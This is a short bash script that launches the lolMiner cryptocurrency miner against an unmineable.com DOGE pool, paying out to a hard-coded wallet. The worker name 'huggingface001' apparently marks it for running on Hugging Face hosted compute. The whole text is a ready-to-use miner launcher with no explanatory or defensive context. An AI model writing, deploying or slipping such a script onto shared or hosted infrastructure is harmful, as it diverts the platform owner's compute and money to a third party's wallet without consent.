#!/bin/bash POOL=ethash.unmineable.com:3333 WALLET=DOGE:DHJiknVbku2TkLyezGLUhcDsM9ZZ86owMf.huggingface001 lolMiner --algo DOGE --pool $POOL --user $WALLET --watchdog exit